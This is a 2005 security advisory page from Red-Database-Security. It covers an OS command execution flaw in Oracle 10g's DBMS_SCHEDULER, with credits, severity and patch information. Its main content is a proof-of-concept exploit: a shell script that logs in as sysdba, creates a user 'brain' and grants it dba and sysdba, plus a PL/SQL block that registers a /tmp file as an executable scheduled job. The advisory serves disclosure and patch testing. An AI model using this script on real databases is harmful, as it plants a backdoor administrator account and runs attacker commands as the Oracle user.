Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g Exploit dbms_scheduler

Name OS command execution via Oracle DBMS_SCHEDULER in Oracle 10g
Systems Affected Oracle 10g
Severity High Risk
Category OS command execution
Vendor URL http://www.oracle.com/
Credit Pete Finnigan of Pete Finnigan Ltd. in conjunction with Jonathan Gennick of O'Reilly and Alexander Kornbrust of Red-Database-Security GmbH
Exploit http://dba.5341.com/msg/34053.html
Date 01 May 2005 (V 1.01)

Details

The following proof of concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle.

Example
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering? " >/dev/console
ORAENV_ASK=NO
ORACLE_SID= <sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba " < <EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF

BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name = > 'take_over_the_world ',
program_action = > '/tmp/pinky_and_the_brain ',
program_type = > 'EXECUTABLE ',
comments = > 'I rulez ');
END;
/

Patch Information
This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets.

References
Pete Finnigan's Security Advisotry - Bug in dbms_scheduler



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.